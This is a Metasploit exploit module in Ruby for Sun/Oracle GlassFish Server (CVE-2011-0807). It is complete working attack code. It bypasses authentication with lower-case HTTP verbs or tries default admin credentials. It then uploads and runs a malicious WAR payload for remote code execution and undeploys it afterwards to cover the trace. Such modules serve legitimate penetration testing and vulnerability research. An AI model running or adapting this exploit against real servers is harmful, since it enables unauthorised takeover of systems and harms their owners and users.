modules/exploits/multi/http/glassfish_deployer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'nokogiri'
require 'metasploit/framework/login_scanner/glassfish'
require 'metasploit/framework/credential_collection'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "Sun/Oracle GlassFish Server Authenticated Code Execution",
'Description' => %q{
This module logs in to a GlassFish Server (Open Source or Commercial) using various
methods (such as authentication bypass, default credentials, or user-supplied login),
and deploys a malicious war file in order to get remote code execution. It has been
tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
GlassFish versions do not allow remote access (Secure Admin) by default, but is required
for exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez', # Msf module for Glassfish 3.0
'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
'sinn3r' # Rewrite for everything
],
'References' =>
[
['CVE', '2011-0807'],
['OSVDB', '71948']
],
'Platform' => ['win', 'linux', 'java'],
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
[ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
[ 'Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DisclosureDate' => '2011-08-04',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(4848),
OptString.new('APP_RPORT',[ true, 'The Application interface port', '8080']),
OptString.new('USERNAME', [ true, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username','' ]),
OptString.new('TARGETURI', [ true, "The URI path of the GlassFish Server", '/']),
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
])
end
#
# Send GET or POST request, and return the response
#
def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
headers = {}
headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
headers['Content-Type'] = ctype if ctype
headers['Connection'] = 'keep-alive'
headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
headers['Accept-Language'] = 'en-US,en;q=0.5'
headers['Accept-Encoding'] = 'gzip, deflate, br'
res = send_request_raw({
'uri' => path,
'method' => method,
'data' => data,
'headers' => headers,
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res
end
#
# Return target
#
def auto_target(session, res, version)
print_status("Attempting to automatically select a target...")
res = query_serverinfo(session, version)
return nil unless res
return nil unless res.body
plat = detect_platform(res.body)
arch = detect_arch(res.body)
# No arch or platform found?
return nil if !arch || !plat
# see if we have a match
targets.each do |t|
return t if (t['Platform'] == plat) && (t['Arch'] == arch)
end
# no matching target found
nil
end
#
# Return platform (win, linux, or osx)
#
def detect_platform(body)
body.each_line do |ln|
ln.chomp!
case ln
when /os\.name = (.*)/
os = $1
case os
when /Windows/
return 'win'
when /Linux/
return 'linux'
when /Mac OS X/
return 'osx'
end
end
end
return 'java'
end
#
# Return ARCH
#
def detect_arch(body)
body.each_line do |ln|
ln.chomp!
case ln
when /os\.arch = (.*)/
ar = $1
case ar
when 'x86', 'i386', 'i686'
return ARCH_X86
when 'x86_64', 'amd64'
return ARCH_X64
end
end
end
end
#
# Return server information
#
def query_serverinfo(session,version)
res = ''
if version == '2.x' || version == '9.x'
path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
res = send_glassfish_request(path, @verbs['GET'], session)
else
path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
res = send_glassfish_request(path, @verbs['GET'], session)
if !res || res.code != 200 || res.body.to_s !~ /Operating System Information/
path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
res = send_glassfish_request(path, @verbs['GET'], session)
end
end
if !res || res.code != 200
print_error("Failed: Error requesting #{path}")
return nil
end
res
end
#
# Return viewstate and entry before deleting a GlassFish application
#
def get_delete_info(session, version, app='')
if version == '2.x' || version == '9.x'
path = '/applications/webApplications.jsf'
res = send_glassfish_request(path, @verbs['GET'], session)
if !res || res.code != 200
print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
return nil
end
input_id = "javax.faces.ViewState"
p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(j_id\d+:j_id\d+)"/
viewstate = res.body.scan(p)[0][0]
entry = nil
p = /<a id="(.*)col1:link" href="\/applications\/webApplicationsEdit.jsf.*appName=(.*)">/
results = res.body.scan(p)
results.each do |hit|
if hit[1] =~ /^#{app}/
entry = hit[0]
entry << "col0:select"
end
end
else
path = '/common/applications/applications.jsf?bare=true'
res = send_glassfish_request(path, @verbs['GET'], session)
if !res || res.code != 200
print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
return nil
end
viewstate = get_viewstate(res.body)
entry = nil
p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
results = res.body.scan(p)
results.each do |hit|
if hit[1] =~ /^#{app}/
entry = hit[0]
entry << "col0:select"
end
end
end
if !viewstate
print_error("Failed: Error getting ViewState")
return nil
elsif !entry
print_error("Failed: Error getting the entry to delete")
end
return viewstate, entry
end
#
# Send an "undeploy" request to Glassfish and remove our backdoor
#
def undeploy(viewstate, session, entry)
#Send undeployment request
data = [
"propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
"&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
"&#{Rex::Text.uri_encode(entry)}=true",
"&propertyForm%3AhelpKey=ref-applications.html",
"&propertyForm_hidden=propertyForm_hidden",
"&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
"&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
"&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
"&javax.faces.partial.execute=%40all",
"&javax.faces.partial.render=%40all",
"&bare=true",
"&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
"&javax.faces.partial.ajax=true"
].join()
path = '/common/applications/applications.jsf'
ctype = 'application/x-www-form-urlencoded'
res = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
if !res
print_error("Undeployment failed on #{path} - No Response")
else
if res.code < 200 || res.code >= 300
print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
end
end
end
def report_glassfish_version(banner)
report_note(
host: rhost,
type: 'glassfish.banner',
data: banner,
update: :unique_data
)
end
#
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
# banner (ex: Sun Java System Application Server 9.x)
#
def get_version(res)
# Extract banner from response
banner = res.headers['Server']
# Default value for edition and glassfish version
edition = 'Commercial'
version = 'Unknown'
# Set edition (Open Source or Commercial)
p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
edition = 'Open Source' if banner =~ p
# Set version. Some GlassFish servers return banner "GlassFish v3".
if banner =~ /(GlassFish Server|Open Source Edition) {1,}(\d\.\d)/
version = $2
elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
version = $1
elsif banner =~ /Sun GlassFish Enterprise Server v2/ && version == 'Unknown'
version = '2.x'
elsif banner =~ /Sun Java System Application Server 9/ && version == 'Unknown'
version = '9.x'
end
if version == nil || version == 'Unknown'
print_status("Unsupported version: #{banner}")
end
report_glassfish_version(banner)
return edition, version, banner
end
#
# Return the formatted version of the POST data
#
def format_2_x_war(boundary,name,value=nil, war=nil)
data = ''
data << boundary
data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; "
data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
data << war
data << "\r\n"
return data
end
#
# Return the formatted version of the POST data
#
def format(boundary,name,value=nil, war=nil)
data = ''
if war
data << boundary
data << "\r\nContent-Disposition: form-data; name=\"form:sheet1:section1:prop1:fileupload\"; "
data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
data << war
data << "\r\n"
else
data << boundary
data << "\r\nContent-Disposition: form-data; name=\"#{name}\""
data << "\r\n\r\n"
data << "#{value}\r\n"
end
return data
end
#
# Return POST data and data length, based on GlassFish edition
#
def get_upload_data(opts = {})
boundary = opts[:boundary]
version = opts[:version]
war = opts[:war]
app_base = opts[:app_base]
typefield = opts[:typefield]
status_checkbox = opts[:status_checkbox]
start = opts[:start]
viewstate = opts[:viewstate]
data = ''
if version == '3.0'
uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
uploadparam_data = "form:sheet1:section1:prop1:fileupload"
boundary = "--#{boundary}"
data = [
format(boundary, app_base, nil, war),
format(boundary, uploadParam_name, uploadparam_data),
format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
format(boundary, "form:sheet1:section1:prop1:action", "client"),
format(boundary, typefield, "war"),
format(boundary, "form:war:psection:cxp:ctx", app_base),
format(boundary, "form:war:psection:nameProp:appName", app_base),
format(boundary, "form:war:psection:vsProp:vs", ""),
format(boundary, status_checkbox, "true"),
format(boundary, "form:war:psection:librariesProp:library", ""),
format(boundary, "form:war:psection:descriptionProp:description", ""),
format(boundary, "form_hidden", "form_hidden"),
format(boundary, "javax.faces.ViewState", viewstate),
"#{boundary}--"
].join()
elsif version == '2.x' || version == '9.x'
uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"
focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
focusElementId_data = 'form:title:topButtons:uploadButton'
boundary = "-----------------------------#{boundary}"
data = [
format_2_x_war(boundary, app_base, nil, war),
format(boundary, "form:title:sheet1:section1:type:appType", "webApp"),
format(boundary, "uploadRdBtn", "client"),
format(boundary, uploadParam_name, uploadParam_data),
format(boundary, "form:title:sheet1:section1:prop1:extension", ".war"),
format(boundary, "form:title:ps:psec:nameProp:appName", app_base),
format(boundary, "form:title:ps:psec:cxp:ctx", app_base),
format(boundary, "form:title:ps:psec:vsp:vs", ""),
format(boundary, status_checkbox, "true"),
format(boundary, "form:title:ps:psec:librariesProp:library", ""),
format(boundary, "form:title:ps:psec:threadpoolProp:threadPool", ""),
format(boundary, "form:title:ps:psec:registryProp:registryType", ""),
format(boundary, "form:title:ps:psec:descriptionProp:description", ""),
format(boundary, "form:helpKey", "uploaddev.html"),
format(boundary, "form_hidden", "form_hidden"),
format(boundary, "javax.faces.ViewState", viewstate),
format(boundary, focusElementId_name, focusElementId_data),
"#{boundary}--"
].join()
else
boundary = "-----------------------------#{boundary}"
#Setup dynamic arguments
num1 = start.to_i
num2 = num1 + 14
num3 = num2 + 2
num4 = num3 + 2
num5 = num4 + 2
num6 = num5 + 2
num7 = num6 + 1
id0 = num4
id1 = num4 + 1
id2 = num4 + 2
id3 = num4 + 3
id4 = num4 + 4
id5 = num4 + 5
id6 = num4 + 6
id7 = num4 + 7
id8 = num4 + 8
id9 = num4 + 9
uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
uploadParam_value = "form:sheet1:section1:prop1:fileupload"
focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
focusElementId_data = "form:title2:bottomButtons:uploadButton"
data = [
format(boundary,"uploadRdBtn","client"),
## web service
format(boundary, app_base, nil, war),
## sheet1
format(boundary, uploadParam_name, uploadParam_value),
format(boundary,"form:sheet1:section1:prop1:extension",".war"),
format(boundary,"form:sheet1:section1:prop1:action","client"),
format(boundary,"form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType","war"),
format(boundary,"form:appClient:psection:nameProp:appName","#{app_base}"),
format(boundary,"form:appClient:psection:descriptionProp:description"),
## war
format(boundary,"form:war:psection:cxp:ctx","#{app_base}"),
format(boundary,"form:war:psection:nameProp:appName","#{app_base}"),
format(boundary,"form:war:psection:vsProp:vs"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id1.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id2.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id3.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id4.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id5.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id6.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
format(boundary,"form:other:psection:descriptionProp:description", ""),
format(boundary,"form:other:psection:librariesProp:library", ""),
format(boundary,"form:other:psection:deploymentOrder:deploymentOrder", ""),
format(boundary,"form:other:psection:implicitCdi:implicitCdi", "true"),
format(boundary,"form:other:psection:enableProp:sun_checkbox44","true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox42","true"),
format(boundary,"form:other:psection:vsProp:vs",""),
format(boundary,"form:rar:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:rar:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:rar:psection:enableProp:sun_checkbox40","true"),
format(boundary,"form:other:psection:nameProp:appName", app_base),
format(boundary,"form:rar:psection:nameProp:appName", app_base),
format(boundary,"form:jar:psection:nameProp:appName", app_base),
format(boundary,"form:ear:psection:nameProp:appName", app_base),
format(boundary,"form:ear:psection:descriptionProp:description",""),
format(boundary,"form:jar:psection:deploymentOrder:deploymentOrder", ""),
format(boundary,"form:jar:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:ear:psection:jw:jwc","true"),
format(boundary,"form:ear:psection:vsProp:vs",""),
format(boundary,"form:appClient:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:jar:psection:enableProp:sun_checkbox38","true"),
format(boundary,"form:jar:psection:descriptionProp:description", ""),
format(boundary,"form:ear:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:appClient:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:ear:psection:enableProp:sun_checkbox36","true"),
format(boundary,"form:war:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:jar:psection:librariesProp:library",""),
format(boundary,"form:appClient:psection:jw:jwt","true"),
format(boundary,"form:ear:psection:librariesProp:library", ""),
format(boundary,"form:sheet1:sun_propertySheetSection23:type:appType","war"),
format(boundary,"form:ear:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:rar:psection:descriptionProp:description",""),
format(boundary,"form:war:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:war:psection:librariesProp:library"),
format(boundary,"form:war:psection:descriptionProp:description"),
format(boundary,"form_hidden","form_hidden"),
format(boundary,"javax.faces.ViewState","#{viewstate}"),
format(boundary, focusElementId_name, focusElementId_data)
].join()
item_list_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"
item_list_data = "|server|com.sun.webui.jsf.separator|"
item_value_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"
item_value_data = "server"
data << format(boundary, item_list_name, item_list_data)
data << format(boundary, item_value_name, item_value_data)
data << "#{boundary}--"
data << "\r\n\r\n"
end
return data
end
def get_viewstate(body)
noko = Nokogiri::HTML(body)
inputs = noko.search('input')
hidden_inputs = []
inputs.each {|e| hidden_inputs << e if e.attributes['type'].text == 'hidden'}
hidden_inputs.each do |e|
if e.attributes['name'].text == 'javax.faces.ViewState'
return e.attributes['value'].text
end
end
''
end
#
# Upload our payload, and execute it. This function will also try to automatically
# clean up after itself.
#
def upload_exec(opts = {})
session = opts[:session]
app_base = opts[:app_base]
jsp_name = opts[:jsp_name]
war = opts[:war]
edition = opts[:edition]
version = opts[:version]
if version == '2.x' || version == '9.x'
path = "/applications/upload.jsf?appType=webApp"
res = send_glassfish_request(path, @verbs['GET'], session)
# Obtain some properties
p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
viewstate = get_viewstate(res.body)
status_checkbox = res.body.scan(p2)[0][0]
boundary = rand_text_alphanumeric(28)
else
path = "/common/applications/uploadFrame.jsf"
res = send_glassfish_request(path, @verbs['GET'], session)
# Obtain some properties
res.body =~ /propertySheetSection(\d{3})/
start = $1
p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
rnd_text = rand_text_alphanumeric(29)
viewstate = get_viewstate(res.body)
typefield = res.body.scan(p2)[0][0]
status_checkbox = res.body.scan(p3)[0][0]
boundary = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
end
# Get upload data
if version == '3.0'
ctype = "multipart/form-data; boundary=#{boundary}"
elsif version == '2.x' || version == '9.x'
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
typefield = ''
start = ''
else
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
end
post_data = get_upload_data({
:boundary => boundary,
:version => version,
:war => war,
:app_base => app_base,
:typefield => typefield,
:status_checkbox => status_checkbox,
:start => start,
:viewstate => viewstate
})
# Upload our payload
if version == '2.x' || version == '9.x'
path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
else
path = '/common/applications/uploadFrame.jsf?'
path << 'form:title:topButtons:uploadButton=Processing...'
path << '&bare=false'
end
res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
# Print upload result
if res && res.code == 302
print_good("Successfully Uploaded")
else
print_error("Error uploading #{res.code}")
return
end
#Execute our payload using the application interface (no need to use auth bypass technique)
jsp_path = normalize_uri(target_uri.path, app_base, "#{jsp_name}.jsp")
nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
{
'Msf' => framework,
'MsfExploit' => self,
}
)
print_status("Executing #{jsp_path}...")
req = nclient.request_raw({
'uri' => jsp_path,
'method' => 'GET',
})
if req
res = nclient.send_recv(req, 90)
else
print_status("Error: #{rhost} did not respond on #{app_rport}.")
end
# Sleep for a bit before cleanup
select(nil, nil, nil, 5)
# Start undeploying
print_status("Getting information to undeploy...")
viewstate, entry = get_delete_info(session, version, app_base)
if !viewstate
fail_with(Failure::Unknown, "Unable to get viewstate")
elsif (not entry)
fail_with(Failure::Unknown, "Unable to get entry")
end
print_status("Undeploying #{app_base}...")
undeploy(viewstate, session, entry)
print_status("Undeployment complete.")
end
def init_loginscanner
@cred_collection = Metasploit::Framework::CredentialCollection.new
@scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
configure_http_login_scanner(
cred_details: @cred_collection,
connection_timeout: 5,
http_username: datastore['HttpUsername'],
http_password: datastore['HttpPassword']
)
)
end
def report_auth_bypass(version)
report_vuln(
name: 'GlassFish HTTP Method Authentication Bypass',
info: "The remote service has a vulnerable version of GlassFish (#{version}) that allows the " \
'attacker to bypass authentication by sending an HTTP verb in lower-case.',
host: rhost,
port: rport,
proto: 'tcp',
refs: self.references
)
end
def try_glassfish_auth_bypass(version)
sid = nil
if version == '2.x' || version == '9.x'
print_status("Trying auth bypass...")
res = send_glassfish_request('/applications/upload.jsf', 'get')
title = '<title>Deploy Enterprise Applications/Modules</title>'
if res && res.code.to_i == 200 && res.body.include?(title)
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
end
else
# 3.0
print_status("Trying auth bypass...")
res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
title = '<title>Deploy Applications or Modules'
if res && res.code.to_i == 200 && res.body.include?(title)
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
end
end
report_auth_bypass(version) if sid
sid
end
def my_target_host
"http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
end
def service_details
super.merge({ post_reference_name: self.refname })
end
def try_normal_login(version)
init_loginscanner
case version
when /2\.x|9\.x/
@cred_collection.prepend_cred(
Metasploit::Framework::Credential.new(
public: 'admin',
private: 'adminadmin',
private_type: :password
))
when /^3\./
@cred_collection.prepend_cred(
Metasploit::Framework::Credential.new(
public: 'admin',
private: '',
private_type: :password
))
end
@cred_collection.prepend_cred(
Metasploit::Framework::Credential.new(
public: datastore['USERNAME'],
private: datastore['PASSWORD'],
private_type: :password
))
@scanner.send_request({'uri'=>normalize_uri(target_uri.path)})
@scanner.version = version
@cred_collection.each do |raw|
cred = raw.to_credential
print_status("Trying to login as #{cred.public}:#{cred.private}")
result = @scanner.attempt_login(cred)
if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
store_valid_credential(user: cred.public, private: cred.private) # changes service_name to http || https
return @scanner.jsession
end
end
nil
end
def attempt_login(version)
sid = nil
if version =~ /3\.0|2\.x|9\.x/
sid = try_glassfish_auth_bypass(version)
return sid if sid
end
try_normal_login(version)
end
def make_war(selected_target)
p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
jsp_name = rand_text_alphanumeric(4+rand(32-4))
app_base = rand_text_alphanumeric(4+rand(32-4))
war = p.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => selected_target.arch,
:platform => selected_target.platform
}).to_s
return app_base, jsp_name, war
end
def exploit
# Invoke index to gather some info
res = send_glassfish_request('/common/index.jsf', 'GET')
if res.code == 302
res = send_glassfish_request('/login.jsf', 'GET')
end
# Get GlassFish version
edition, version, banner = get_version(res)
print_status("Glassfish edition: #{banner}")
# Set HTTP verbs. Lower-case is used to bypass auth on v3.0
@verbs = {
'GET' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
}
sid = attempt_login(version)
unless sid
fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate")
end
selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
app_base, jsp_name, war = make_war(selected_target)
print_status("Uploading payload...")
res = upload_exec({
:session => sid,
:app_base => app_base,
:jsp_name => jsp_name,
:war => war,
:edition => edition,
:version => version
})
end
end